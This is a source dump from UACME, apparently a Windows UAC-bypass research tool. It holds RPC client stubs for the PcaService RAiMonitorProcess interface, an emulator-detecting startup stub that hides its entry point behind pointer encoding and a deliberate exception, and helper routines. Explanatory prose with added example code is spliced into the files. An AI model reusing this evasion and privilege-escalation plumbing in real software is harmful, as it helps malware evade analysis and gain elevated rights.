#define DECLSPEC_XFGVIRT(base, func) __declspec(xfg_virtual(base, func))
#else
#define DECLSPEC_XFGVIRT(base, func)
#endif
#endif

/* Forward Declarations */ 

#ifdef __cplusplus
extern "C"{
#endif 

#ifndef __PcaService_INTERFACE_DEFINED__
#define __PcaService_INTERFACE_DEFINED__

/* interface PcaService */
/* [explicit_handle][version][uuid] */ 

long RAiMonitorProcess( 
    handle_t bindingHandle,
    /* [in] */ unsigned __int3264 hProcess,
    /* [in] */ long unknown0,
    /* [string][unique][in] */ wchar_t *exeFileName,
    /* [string][unique][in] */ wchar_t *cmdLine,
    /* [string][unique][in] */ wchar_t *workingDir,
    /* [in] */ long flags);

extern RPC_IF_HANDLE PcaService_v1_0_c_ifspec;
extern RPC_IF_HANDLE PcaService_v1_0_s_ifspec;
#endif /* __PcaService_INTERFACE_DEFINED__ */

/* Additional Prototypes for ALL interfaces */

/* end of Additional Prototypes */

#ifdef __cplusplus
}
#endif

#endif

================================================
FILE: Source/Akagi/pcasvc/w8_10/x86-32/pcasvc32.c
================================================
/*
   File has been edited after MIDL compiler, changes:
   1. XCFG BS removed
   2.
      Warning suppression added
*/

/* File created by MIDL compiler version 8.01.0626 */
/* at Mon Jan 18 19:14:07 2038
 */
/* Compiler settings for pcasvc.idl:
    Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0626 
    protocol : dce , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data 
    VC __declspec() decoration level: 
         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING(  ) */

#if !defined(_M_IA64) && !defined(_M_AMD64) && !defined(_ARM_) 

#pragma warning( disable: 4049 )  /* more than 64k source lines */
#if _MSC_VER >= 1200
#pragma warning(push)
#endif

#pragma warning( disable: 4211 )  /* redefine extern to static */
#pragma warning( disable: 4232 )  /* dllimport identity*/
#pragma warning( disable: 4024 )  /* array to pointer mapping*/
#pragma warning( disable: 4100 )  /* unreferenced arguments in x86 call */

#pragma optimize("", off ) 

#include <string.h>

#include "pcasvc32.h"

#define TYPE_FORMAT_STRING_SIZE   7                                 
#define PROC_FORMAT_STRING_SIZE   71                                
#define EXPR_FORMAT_STRING_SIZE   1                                 
#define TRANSMIT_AS_TABLE_SIZE    0            
#define WIRE_MARSHAL_TABLE_SIZE   0            

typedef struct _pcasvc_MIDL_TYPE_FORMAT_STRING
    {
    short          Pad;
    unsigned char  Format[ TYPE_FORMAT_STRING_SIZE ];
    } pcasvc_MIDL_TYPE_FORMAT_STRING;

typedef struct _pcasvc_MIDL_PROC_FORMAT_STRING
    {
    short          Pad;
    unsigned char  Format[ PROC_FORMAT_STRING_SIZE ];
    } pcasvc_MIDL_PROC_FORMAT_STRING;

typedef struct _pcasvc_MIDL_EXPR_FORMAT_STRING
    {
    long          Pad;
    unsigned char  Format[ EXPR_FORMAT_STRING_SIZE ];
    } pcasvc_MIDL_EXPR_FORMAT_STRING;


static const RPC_SYNTAX_IDENTIFIER  _RpcTransferSyntax = 
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};


extern const pcasvc_MIDL_TYPE_FORMAT_STRING pcasvc__MIDL_TypeFormatString;
extern const pcasvc_MIDL_PROC_FORMAT_STRING pcasvc__MIDL_ProcFormatString;
extern const pcasvc_MIDL_EXPR_FORMAT_STRING pcasvc__MIDL_ExprFormatString;

#define GENERIC_BINDING_TABLE_SIZE   0            


/* Standard interface: PcaService,
   ver. 1.0,
   GUID={0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}} */



static const RPC_CLIENT_INTERFACE PcaService___RpcClientInterface =
    {
    sizeof(RPC_CLIENT_INTERFACE),
    {{0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}},{1,0}},
    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
    0,
    0,
    0,
    0,
    0,
    0x00000000
    };
RPC_IF_HANDLE PcaService_v1_0_c_ifspec = (RPC_IF_HANDLE)& PcaService___RpcClientInterface;

extern const MIDL_STUB_DESC PcaService_StubDesc;

static RPC_BINDING_HANDLE PcaService__MIDL_AutoBindHandle;


long RAiMonitorProcess( 
    handle_t bindingHandle,
    /* [in] */ unsigned __int3264 hProcess,
    /* [in] */ long unknown0,
    /* [string][unique][in] */ wchar_t *exeFileName,
    /* [string][unique][in] */ wchar_t *cmdLine,
    /* [string][unique][in] */ wchar_t *workingDir,
    /* [in] */ long flags)
{

    CLIENT_CALL_RETURN _RetVal;

    _RetVal = NdrClientCall2(
                  ( PMIDL_STUB_DESC  )&PcaService_StubDesc,
                  (PFORMAT_STRING) &pcasvc__MIDL_ProcFormatString.Format[0],
                  ( unsigned char * )&bindingHandle);
    return ( long  )_RetVal.Simple;
    
}


#if !defined(__RPC_WIN32__)
#error  Invalid build platform for this stub.
#endif

#if !(TARGET_IS_NT50_OR_LATER)
#error You need Windows 2000 or later to run this stub because it uses these features:
#error   /robust command line switch.
#error However, your C/C++ compilation flags indicate you intend to run this app on earlier systems.
#error This app will fail with the RPC_X_WRONG_STUB_VERSION error.
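The byte arrays named pcasvc__MIDL_ProcFormatString in pcasvc64.c above and pcasvc32.c below are the only thing NdrClientCall2 reads to marshal RAiMonitorProcess: the opnum, the client stack size, and one six-byte descriptor per parameter giving its flags, stack offset and either a base FC code or an offset into the type format string. Being able to decode them by hand is how one recovers an RPC interface from a binary that ships only the stubs. The parser below is an added example written for this page; it is not UACME code or MIDL output. The format-character and flag values are taken from rpcndr.h, the two proc strings and the type string are the bytes from the stubs on this page (embedded inline, with NdrFcShort/NdrFcLong already expanded little-endian), and the names ndr_parse_proc, ndr_pointee, kProcX64, kProcX86 and kTypeFmt are mine. It also makes the __int3264 point concrete: hProcess is FC_UINT3264 in an 8-byte slot on x64 but a plain FC_LONG in a 4-byte slot on x86, and the extension block after the Oi2 flags is 10 bytes on x64 (extra float-argument mask) versus 8 on x86.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* NDR format characters and flag bits (values as in rpcndr.h) used by this parser. */
#define FC_LONG            0x08
#define FC_C_WSTRING       0x25
#define FC_BIND_PRIMITIVE  0x32
#define FC_UINT3264        0xb9
#define FC_SIMPLE_POINTER  0x08   /* pointer-flag byte: pointee is a simple type */
#define OI2_HAS_EXTENSIONS 0x40
#define PARAM_IS_BASETYPE  0x0040
#define MAX_PARAMS         16

typedef struct {
    uint16_t flags, stack_offset;
    uint8_t  base_type;    /* FC_* when flags & PARAM_IS_BASETYPE */
    uint16_t type_offset;  /* index into the type format string otherwise */
} ndr_param_t;

typedef struct {
    size_t   consumed;     /* bytes parsed, 0 on error */
    uint16_t proc_num, stack_size, client_buffer_size, server_buffer_size;
    uint8_t  oi2_flags, param_count, ext_size;
    ndr_param_t params[MAX_PARAMS];
} ndr_proc_t;

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }

/* Decode one -Oicf (Oi2) procedure header with an explicit primitive handle, the
 * shape MIDL emits for [explicit_handle] interfaces such as PcaService. */
ndr_proc_t ndr_parse_proc(const uint8_t *fmt, size_t len)
{
    ndr_proc_t r = {0};
    size_t pos;
    uint8_t i;
    if (len < 20 || fmt[0] != 0 /* explicit handle */ || fmt[10] != FC_BIND_PRIMITIVE)
        return r;
    r.proc_num   = rd16(fmt + 6);    /* opnum sent on the wire */
    r.stack_size = rd16(fmt + 8);    /* client stack bytes covered by the call */
    pos = 14;                        /* skip the 4-byte FC_BIND_PRIMITIVE descriptor */
    r.client_buffer_size = rd16(fmt + pos);
    r.server_buffer_size = rd16(fmt + pos + 2);
    r.oi2_flags   = fmt[pos + 4];
    r.param_count = fmt[pos + 5];
    pos += 6;
    if (r.oi2_flags & OI2_HAS_EXTENSIONS) {  /* 8 bytes on x86, 10 on x64 (float mask) */
        r.ext_size = fmt[pos];
        pos += r.ext_size;
    }
    if (r.param_count > MAX_PARAMS || pos + 6u * r.param_count > len)
        return r;
    for (i = 0; i < r.param_count; i++, pos += 6) {   /* 6-byte parameter descriptors */
        ndr_param_t *p = &r.params[i];
        p->flags        = rd16(fmt + pos);
        p->stack_offset = rd16(fmt + pos + 2);
        if (p->flags & PARAM_IS_BASETYPE) p->base_type   = fmt[pos + 4];
        else                              p->type_offset = rd16(fmt + pos + 4);
    }
    r.consumed = pos;
    return r;
}

/* Follow a non-base parameter's type offset and return the pointee FC code when the
 * entry is a simple pointer (FC_RP..FC_FP, 0x11..0x14), e.g. FC_UP -> FC_C_WSTRING. */
uint8_t ndr_pointee(const uint8_t *type_fmt, size_t len, uint16_t off)
{
    if ((size_t)off + 2 >= len || type_fmt[off] < 0x11 || type_fmt[off] > 0x14) return 0;
    return (type_fmt[off + 1] & FC_SIMPLE_POINTER) ? type_fmt[off + 2] : 0;
}

/* pcasvc__MIDL_ProcFormatString for RAiMonitorProcess, bytes copied from pcasvc64.c. */
static const uint8_t kProcX64[] = {
    0x00,0x48, 0,0,0,0, 0x00,0x00, 0x40,0x00, 0x32,0x00, 0x00,0x00,
    0x18,0x00, 0x08,0x00, 0x46,0x07, 0x0a,0x01, 0,0, 0,0, 0,0, 0,0,
    0x48,0x00, 0x08,0x00, 0xb9,0x00,   /* hProcess    FC_UINT3264 */
    0x48,0x00, 0x10,0x00, 0x08,0x00,   /* unknown0    FC_LONG */
    0x0b,0x00, 0x18,0x00, 0x02,0x00,   /* exeFileName type offset 2 */
    0x0b,0x00, 0x20,0x00, 0x02,0x00,   /* cmdLine */
    0x0b,0x00, 0x28,0x00, 0x02,0x00,   /* workingDir */
    0x48,0x00, 0x30,0x00, 0x08,0x00,   /* flags       FC_LONG */
    0x70,0x00, 0x38,0x00, 0x08,0x00,   /* return      FC_LONG */
    0x00 };
/* Same procedure from pcasvc32.c: 8-byte extension block, 4-byte slots, hProcess is FC_LONG. */
static const uint8_t kProcX86[] = {
    0x00,0x48, 0,0,0,0, 0x00,0x00, 0x20,0x00, 0x32,0x00, 0x00,0x00,
    0x18,0x00, 0x08,0x00, 0x46,0x07, 0x08,0x01, 0,0, 0,0, 0,0,
    0x48,0x00, 0x04,0x00, 0x08,0x00,  0x48,0x00, 0x08,0x00, 0x08,0x00,
    0x0b,0x00, 0x0c,0x00, 0x02,0x00,  0x0b,0x00, 0x10,0x00, 0x02,0x00,
    0x0b,0x00, 0x14,0x00, 0x02,0x00,  0x48,0x00, 0x18,0x00, 0x08,0x00,
    0x70,0x00, 0x1c,0x00, 0x08,0x00,  0x00 };
/* pcasvc__MIDL_TypeFormatString: offset 2 is FC_UP [simple_pointer] -> FC_C_WSTRING. */
static const uint8_t kTypeFmt[] = { 0x00,0x00, 0x12,0x08, 0x25,0x5c, 0x00 };

int main(void)
{
    ndr_proc_t procs[2] = { ndr_parse_proc(kProcX64, sizeof kProcX64),
                            ndr_parse_proc(kProcX86, sizeof kProcX86) };
    for (int a = 0; a < 2; a++) {
        const ndr_proc_t *r = &procs[a];
        printf("%s: opnum %u, stack %u bytes, %u params, ext %u\n", a ? "x86" : "x64",
               (unsigned)r->proc_num, (unsigned)r->stack_size, (unsigned)r->param_count, (unsigned)r->ext_size);
        for (int i = 0; i < r->param_count; i++) {
            const ndr_param_t *p = &r->params[i];
            int base = p->flags & PARAM_IS_BASETYPE;
            printf("  +%-2u flags 0x%03x  %s 0x%02x\n", (unsigned)p->stack_offset, (unsigned)p->flags,
                   base ? "base FC" : "pointee FC",
                   base ? p->base_type : ndr_pointee(kTypeFmt, sizeof kTypeFmt, p->type_offset));
        }
    }
    return 0;
}
```

The same routine decodes the Windows 7 stub in pcasvc7_32.c once its proc string is pasted in; there the opnum is 4 and exePathName resolves through offset 4 of a type string that starts with FC_RP (0x11, a [ref] pointer) instead of FC_UP (0x12, [unique]), which is exactly the difference between the `[string]` and `[unique][string]` attributes in the two IDL files.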
#endif


static const pcasvc_MIDL_PROC_FORMAT_STRING pcasvc__MIDL_ProcFormatString =
    {
        0,
        {

    /* Procedure RAiMonitorProcess */

            0x0,        /* 0 */
            0x48,       /* Old Flags:  */
/*  2 */    NdrFcLong( 0x0 ),   /* 0 */
/*  6 */    NdrFcShort( 0x0 ),  /* 0 */
/*  8 */    NdrFcShort( 0x20 ), /* x86 Stack size/offset = 32 */
/* 10 */    0x32,       /* FC_BIND_PRIMITIVE */
            0x0,        /* 0 */
/* 12 */    NdrFcShort( 0x0 ),  /* x86 Stack size/offset = 0 */
/* 14 */    NdrFcShort( 0x18 ), /* 24 */
/* 16 */    NdrFcShort( 0x8 ),  /* 8 */
/* 18 */    0x46,       /* Oi2 Flags:  clt must size, has return, has ext, */
            0x7,        /* 7 */
/* 20 */    0x8,        /* 8 */
            0x1,        /* Ext Flags:  new corr desc, */
/* 22 */    NdrFcShort( 0x0 ),  /* 0 */
/* 24 */    NdrFcShort( 0x0 ),  /* 0 */
/* 26 */    NdrFcShort( 0x0 ),  /* 0 */

    /* Parameter hProcess */

/* 28 */    NdrFcShort( 0x48 ), /* Flags:  in, base type, */
/* 30 */    NdrFcShort( 0x4 ),  /* x86 Stack size/offset = 4 */
/* 32 */    0x8,        /* FC_LONG */
            0x0,        /* 0 */

    /* Parameter unknown0 */

/* 34 */    NdrFcShort( 0x48 ), /* Flags:  in, base type, */
/* 36 */    NdrFcShort( 0x8 ),  /* x86 Stack size/offset = 8 */
/* 38 */    0x8,        /* FC_LONG */
            0x0,        /* 0 */

    /* Parameter exeFileName */

/* 40 */    NdrFcShort( 0xb ),  /* Flags:  must size, must free, in, */
/* 42 */    NdrFcShort( 0xc ),  /* x86 Stack size/offset = 12 */
/* 44 */    NdrFcShort( 0x2 ),  /* Type Offset=2 */

    /* Parameter cmdLine */

/* 46 */    NdrFcShort( 0xb ),  /* Flags:  must size, must free, in, */
/* 48 */    NdrFcShort( 0x10 ), /* x86 Stack size/offset = 16 */
/* 50 */    NdrFcShort( 0x2 ),  /* Type Offset=2 */

    /* Parameter workingDir */

/* 52 */    NdrFcShort( 0xb ),  /* Flags:  must size, must free, in, */
/* 54 */    NdrFcShort( 0x14 ), /* x86 Stack size/offset = 20 */
/* 56 */    NdrFcShort( 0x2 ),  /* Type Offset=2 */

    /* Parameter flags */

/* 58 */    NdrFcShort( 0x48 ), /* Flags:  in, base type, */
/* 60 */    NdrFcShort( 0x18 ), /* x86 Stack size/offset = 24 */
/* 62 */    0x8,        /* FC_LONG */
            0x0,        /* 0 */

    /* Return value */

/* 64 */    NdrFcShort( 0x70 ), /* Flags:  out, return, base type, */
/* 66 */    NdrFcShort( 0x1c ), /*
 x86 Stack size/offset = 28 */
/* 68 */    0x8,        /* FC_LONG */
            0x0,        /* 0 */

            0x0
        }
    };

static const pcasvc_MIDL_TYPE_FORMAT_STRING pcasvc__MIDL_TypeFormatString =
    {
        0,
        {
            NdrFcShort( 0x0 ),  /* 0 */
/*  2 */    
            0x12, 0x8,  /* FC_UP [simple_pointer] */
/*  4 */    
            0x25,       /* FC_C_WSTRING */
            0x5c,       /* FC_PAD */

            0x0
        }
    };

static const unsigned short PcaService_FormatStringOffsetTable[] =
    {
    0
    };


static const MIDL_STUB_DESC PcaService_StubDesc = 
    {
    (void *)& PcaService___RpcClientInterface,
    MIDL_user_allocate,
    MIDL_user_free,
    &PcaService__MIDL_AutoBindHandle,
    0,
    0,
    0,
    0,
    pcasvc__MIDL_TypeFormatString.Format,
    1, /* -error bounds_check flag */
    0x50002, /* Ndr library version */
    0,
    0x8010272, /* MIDL Version 8.1.626 */
    0,
    0,
    0,  /* notify & notify_flag routine table */
    0x1,  /* MIDL flag */
    0, /* cs routines */
    0,   /* proxy/server info */
    0
    };

#if _MSC_VER >= 1200
#pragma warning(pop)
#endif

#else
#pragma warning(disable:4206)
#endif /* !defined(_M_IA64) && !defined(_M_AMD64) && !defined(_ARM_) */

================================================
FILE: Source/Akagi/pcasvc/w8_10/x86-32/pcasvc32.h
================================================
/* this ALWAYS GENERATED file contains the definitions for the interfaces */

/* File created by MIDL compiler version 8.01.0626 */
/* at Mon Jan 18 19:14:07 2038
 */
/* Compiler settings for pcasvc.idl:
    Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0626 
    protocol : dce , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data 
    VC __declspec() decoration level: 
         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING(  ) */

#pragma warning( disable: 4049 )  /* more than 64k source lines */

/* verify that the <rpcndr.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 475
#endif

#include "rpc.h"
#include "rpcndr.h"

#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif /*
 __RPCNDR_H_VERSION__ */

#ifndef __pcasvc32_h__
#define __pcasvc32_h__

#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif

#ifndef DECLSPEC_XFGVIRT
#if _CONTROL_FLOW_GUARD_XFG
#define DECLSPEC_XFGVIRT(base, func) __declspec(xfg_virtual(base, func))
#else
#define DECLSPEC_XFGVIRT(base, func)
#endif
#endif

/* Forward Declarations */ 

#ifdef __cplusplus
extern "C"{
#endif 

#ifndef __PcaService_INTERFACE_DEFINED__
#define __PcaService_INTERFACE_DEFINED__

/* interface PcaService */
/* [explicit_handle][version][uuid] */ 

long RAiMonitorProcess( 
    handle_t bindingHandle,
    /* [in] */ unsigned __int3264 hProcess,
    /* [in] */ long unknown0,
    /* [string][unique][in] */ wchar_t *exeFileName,
    /* [string][unique][in] */ wchar_t *cmdLine,
    /* [string][unique][in] */ wchar_t *workingDir,
    /* [in] */ long flags);

extern RPC_IF_HANDLE PcaService_v1_0_c_ifspec;
extern RPC_IF_HANDLE PcaService_v1_0_s_ifspec;
#endif /* __PcaService_INTERFACE_DEFINED__ */

/* Additional Prototypes for ALL interfaces */

/* end of Additional Prototypes */

#ifdef __cplusplus
}
#endif

#endif

================================================
FILE: Source/Akagi/stub.c
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2018 - 2022
*
*  TITLE:       STUB.C
*
*  VERSION:     3.62
*
*  DATE:        08 Jul 2022
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/

#include "global.h"

TEB_ACTIVE_FRAME_CONTEXT g_fctx = { 0, "(*^-^*)" };

/*
* ucmSehHandler
*
* Purpose:
*
* Program entry point seh handler, indirect control passing.
*
*/
INT ucmSehHandler(
    _In_ UINT ExceptionCode,
    _In_ EXCEPTION_POINTERS* ExceptionInfo
)
{
    UACME_THREAD_CONTEXT* uctx;

    UNREFERENCED_PARAMETER(ExceptionInfo);

    if (ExceptionCode == STATUS_INTEGER_DIVIDE_BY_ZERO) {
        uctx = (UACME_THREAD_CONTEXT*)RtlGetFrame();
        while ((uctx != NULL) && (uctx->Frame.Context != &g_fctx)) {
            uctx = (UACME_THREAD_CONTEXT*)uctx->Frame.Previous;
        }
        if (uctx) {
            if (uctx->ucmMain) {
                uctx->ucmMain = (pfnEntryPoint)supDecodePointer(uctx->ucmMain);
                uctx->ReturnedResult = uctx->ucmMain(UacMethodInvalid, NULL, 0);
            }
        }
        return EXCEPTION_EXECUTE_HANDLER;
    }
    return EXCEPTION_CONTINUE_SEARCH;
}

DWORD StubInit(
    _In_ PVOID EntryPoint)
{
    int v = 1, d = 0;
    UACME_THREAD_CONTEXT uctx;

    RtlSecureZeroMemory(&uctx, sizeof(uctx));

    if (wdIsEmulatorPresent() == STATUS_NOT_SUPPORTED) {

        uctx.Frame.Context = &g_fctx;
        uctx.ucmMain = (pfnEntryPoint)supEncodePointer(EntryPoint);
        RtlPushFrame((PTEB_ACTIVE_FRAME)&uctx);

        __try {
            v = (int)USER_SHARED_DATA->NtProductType;
            d = (int)USER_SHARED_DATA->AlternativeArchitecture;
            v = (int)(v / d);
        }
        __except (ucmSehHandler(GetExceptionCode(), GetExceptionInformation())) {
            v = 1;
        }

        RtlPopFrame((PTEB_ACTIVE_FRAME)&uctx);
    }

    if (v)
        return uctx.ReturnedResult;
    else
        return (DWORD)STATUS_ACCESS_DENIED;
}

================================================
FILE: Source/Akagi/stub.h
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2018 - 2022
*
*  TITLE:       STUB.H
*
*  VERSION:     3.59
*
*  DATE:        02 Feb 2022
*
*  Kuma stub header file
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/

#pragma once

DWORD StubInit(_In_ PVOID EntryPoint);

================================================
FILE: Source/Akagi/sup.c
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2015 - 2026
*
*  TITLE:       SUP.C
*
*  VERSION:     3.69
*
*  DATE:        12 Feb 2026
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/

#include "global.h"
#include "uas.h"

//
// Signatures array.
//
USER_ASSOC_SIGNATURE* g_UserAssocSignatures[] = {
    &UAS_SIG_7601,
    &UAS_SIG_9600,
    &UAS_SIG_14393,
    &UAS_SIG_17763,
    &UAS_SIG_18362,
    &UAS_SIG_18363,
    &UAS_SIG_19041,
    &UAS_SIG_19042_19043,
    &UAS_SIG_22000,
    &UAS_SIG_22621,
    &UAS_SIG_26100
};

#if defined(__cplusplus)
extern "C" {
#endif

_Must_inspect_result_
_Ret_maybenull_
_Post_writable_byte_size_(size)
void* __RPC_USER MIDL_user_allocate(_In_ size_t size)
{
    return((void __RPC_FAR*) supHeapAlloc(size));
}

#pragma warning(push)
#pragma warning(disable: 6387)
#pragma warning(disable: 6001)
void __RPC_USER MIDL_user_free(_Pre_maybenull_ _Post_invalid_ void* p)
{
    supHeapFree(p);
}
#pragma warning(pop)

#if defined(__cplusplus)
}
#endif

/*
* supEncodePointer
*
* Purpose:
*
* Encodes the specified pointer.
*
*/
PVOID supEncodePointer(
    _In_ PVOID Pointer)
{
    NTSTATUS Status;
    ULONG Cookie, retLength;

    if ((g_ctx == NULL) || (g_ctx->Cookie == 0)) {

        Status = NtQueryInformationProcess(
            NtCurrentProcess(),
            ProcessCookie,
            &Cookie,
            sizeof(ULONG),
            &retLength);

        if (!NT_SUCCESS(Status))
            RtlRaiseStatus(Status);

        if (g_ctx)
            g_ctx->Cookie = Cookie;
    }
    else {
        Cookie = g_ctx->Cookie;
    }

#ifdef _WIN64
    return (PVOID)(RotateRight64(
        (ULONG_PTR)Pointer ^ Cookie,
        Cookie & 0x3f));
#else
    return (PVOID)(RotateRight32(
        (ULONG_PTR)Pointer ^ Cookie,
        Cookie & 0x1f));
#endif
}

/*
* supDecodePointer
*
* Purpose:
*
* Decodes the specified pointer.
*
*/
PVOID supDecodePointer(
    _In_ PVOID Pointer)
{
    NTSTATUS Status;
    ULONG Cookie, retLength;

    if ((g_ctx == NULL) || (g_ctx->Cookie == 0)) {

        Status = NtQueryInformationProcess(
            NtCurrentProcess(),
            ProcessCookie,
            &Cookie,
            sizeof(ULONG),
            &retLength);

        if (!NT_SUCCESS(Status))
            RtlRaiseStatus(Status);

        if (g_ctx)
            g_ctx->Cookie = Cookie;
    }
    else {
        Cookie = g_ctx->Cookie;
    }

#ifdef _WIN64
    return (PVOID)(RotateRight64(
        (ULONG_PTR)Pointer,
        0x40 - (Cookie & 0x3f)) ^ Cookie);
#else
    return (PVOID)(RotateRight32(
        (ULONG_PTR)Pointer,
        0x20 - (Cookie & 0x1f)) ^ Cookie);
#endif
}

/*
* supVirtualAlloc
*
* Purpose:
*
* Wrapper for NtAllocateVirtualMemory.
*
*/
PVOID supVirtualAlloc(
    _Inout_ PSIZE_T Size,
    _In_ ULONG AllocationType,
    _In_ ULONG Protect,
    _Out_opt_ NTSTATUS* Status)
{
    NTSTATUS status;
    PVOID Buffer = NULL;
    SIZE_T size;

    size = *Size;

    status = NtAllocateVirtualMemory(
        NtCurrentProcess(),
        &Buffer,
        0,
        &size,
        AllocationType,
        Protect);

    if (NT_SUCCESS(status)) {
        RtlSecureZeroMemory(Buffer, size);
    }

    *Size = size;
    if (Status)
        *Status = status;

    return Buffer;
}

/*
* supVirtualFree
*
* Purpose:
*
* Wrapper for NtFreeVirtualMemory.
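supEncodePointer and supDecodePointer above implement the pointer-encoding transform themselves instead of calling EncodePointer: XOR the pointer with the 32-bit process cookie returned by NtQueryInformationProcess(ProcessCookie), then rotate right by the low six (x64) or five (x86) bits of the cookie; decoding rotates back by the complementary count and XORs again. stub.c relies on this to keep the real entry point scrambled in the TEB active-frame context until the divide-by-zero handler decodes it. The block below is an added example written for this page, not UACME code: it re-implements the transform portably so the round trip can be checked on any platform, with the cookie passed in as a parameter (all cookie and pointer values are constructed) and the names encode_ptr64, decode_ptr64, encode_ptr32, decode_ptr32 and roundtrip_failures mine. It covers the two edge rotation counts, 0 (where the decode count becomes 64 and must mask to a no-op, as the hardware rotate does) and 63, and shows that an off-by-one cookie yields garbage rather than the original pointer.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Portable stand-ins for the RotateRight64/RotateRight32 intrinsics the project uses;
 * like the x86 ror instruction they mask the count to the operand width. */
static uint64_t ror64(uint64_t v, unsigned n) { n &= 63; return n ? (v >> n) | (v << (64 - n)) : v; }
static uint32_t ror32(uint32_t v, unsigned n) { n &= 31; return n ? (v >> n) | (v << (32 - n)) : v; }

/* supEncodePointer, 64-bit path: XOR with the 32-bit process cookie, then rotate right by
 * the cookie's low six bits. The cookie is a parameter here; the project fetches it from
 * NtQueryInformationProcess(ProcessCookie) and caches it in g_ctx->Cookie. */
uint64_t encode_ptr64(uint64_t ptr, uint32_t cookie) { return ror64(ptr ^ cookie, cookie & 0x3f); }
/* supDecodePointer, 64-bit path: rotate right by 64 - n (a left rotate by n), then XOR. */
uint64_t decode_ptr64(uint64_t enc, uint32_t cookie) { return ror64(enc, 0x40 - (cookie & 0x3f)) ^ cookie; }

/* Same construction with the 32-bit widths used when _WIN64 is not defined. */
uint32_t encode_ptr32(uint32_t ptr, uint32_t cookie) { return ror32(ptr ^ cookie, cookie & 0x1f); }
uint32_t decode_ptr32(uint32_t enc, uint32_t cookie) { return ror32(enc, 0x20 - (cookie & 0x1f)) ^ cookie; }

/* Sweep cookies whose low byte takes every value, so every rotation count 0..63 (and 0..31)
 * is exercised, over pointers that set the top bit and the low bits. Returns the number of
 * round trips that did not restore the original pointer; 0 means the inverse is exact. */
int roundtrip_failures(void)
{
    static const uint64_t ptrs[] = { 0, 0x00007ff6deadbeefULL, 0xffff800012345678ULL, 0x1ULL << 63 };
    int failures = 0;
    for (uint32_t c = 0; c < 256; c++) {
        uint32_t cookie = (c * 0x01010101u) ^ 0x9e3779b9u;   /* constructed, not a real cookie */
        for (size_t i = 0; i < sizeof ptrs / sizeof ptrs[0]; i++) {
            if (decode_ptr64(encode_ptr64(ptrs[i], cookie), cookie) != ptrs[i]) failures++;
            if (decode_ptr32(encode_ptr32((uint32_t)ptrs[i], cookie), cookie) != (uint32_t)ptrs[i]) failures++;
        }
    }
    return failures;
}

int main(void)
{
    uint64_t ptr = 0x00007ff6deadbeefULL;   /* constructed: a plausible user-mode code address */
    uint32_t cookie = 0x12345678u;          /* constructed cookie; low six bits give rotate count 56 */
    uint64_t enc = encode_ptr64(ptr, cookie);
    printf("ptr      %016llx\n", (unsigned long long)ptr);
    printf("encoded  %016llx\n", (unsigned long long)enc);
    printf("decoded  %016llx  (correct cookie)\n", (unsigned long long)decode_ptr64(enc, cookie));
    printf("decoded  %016llx  (cookie off by one)\n", (unsigned long long)decode_ptr64(enc, cookie + 1));
    printf("round-trip failures across all rotation counts: %d\n", roundtrip_failures());
    return 0;
}
```

Two practical points follow from the code. First, the transform is keyed only by the process cookie, and the same ProcessCookie query the project uses is available to anything that can open the process with PROCESS_QUERY_INFORMATION, so an encoded pointer resists blind or partial overwrites but is not a secret; anyone holding the cookie can decode the stored entry point or forge a replacement with encode_ptr64. Second, because the cookie is 32 bits wide, the XOR only touches the low half of a 64-bit pointer; it is the rotation that moves cookie-dependent bits into the upper half, which is why the rotate count is taken from the cookie rather than fixed.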
*
*/
BOOL supVirtualFree(
    _In_ PVOID Memory,
    _Out_opt_ NTSTATUS* Status)
{
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    SIZE_T size = 0;

    status = NtFreeVirtualMemory(
        NtCurrentProcess(),
        &Memory,
        &size,
        MEM_RELEASE);

    if (Status)
        *Status = status;

    return NT_SUCCESS(status);
}

/*
* supSecureVirtualFree
*
* Purpose:
*
* Wrapper for NtFreeVirtualMemory.
*
*/
BOOL supSecureVirtualFree(
    _In_ PVOID Memory,
    _In_ SIZE_T MemorySize,
